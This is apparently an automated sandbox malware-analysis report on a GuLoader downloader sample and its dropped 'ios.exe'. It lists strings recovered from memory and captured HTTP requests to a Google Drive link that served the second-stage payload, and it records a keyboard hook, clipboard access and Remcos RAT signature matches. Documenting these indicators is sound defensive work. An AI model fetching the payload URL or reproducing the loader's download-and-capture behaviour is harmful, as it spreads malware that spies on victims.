Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0L
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://s2.symcb.com0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://subca.ocsp-certum.com02
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://subca.ocsp-certum.com05
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://sv.symcd.com0&
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, ios.exe.8.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.gopher.ftp://ftp.
Source: ios.exe, 0000001F.00000001.1820408764.0000000000626000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.symauth.com/cps0(
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.symauth.com/rpa00
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.vmware.com/0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://www.vmware.com/0/
Source: ios.exe, 0000001F.00000001.1820155163.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: ios.exe, 0000001F.00000001.1820155163.00000000005F2000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323184986.000000000197E000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.1992569857.0000000001840000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/
Source: ios.exe, 0000001F.00000003.1992569857.0000000001840000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/#
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/%%doc-0o-68-docs.googleusercontent.com
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323184986.000000000197E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/G9
Source: ios.exe, 0000001F.00000003.2411880906.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716344256.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412551928.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.1986487349.000000000184F000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cf8qgqli
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323318940.0000000001996000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpb
Source: ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/uR
Source: ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1322818122.0000000001938000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/9
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm
Source: ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzmbu
Source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0~
Source: portaudio_x64.dll.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpbbdq1ma5od724n4arlrasmcfv/1653325275000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-68-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cf8qgqli4rihm7727e1v30p2jqpcricp/1653325350000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-68-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49771 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\ios.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ios.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR
Uses 32bit PE files
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
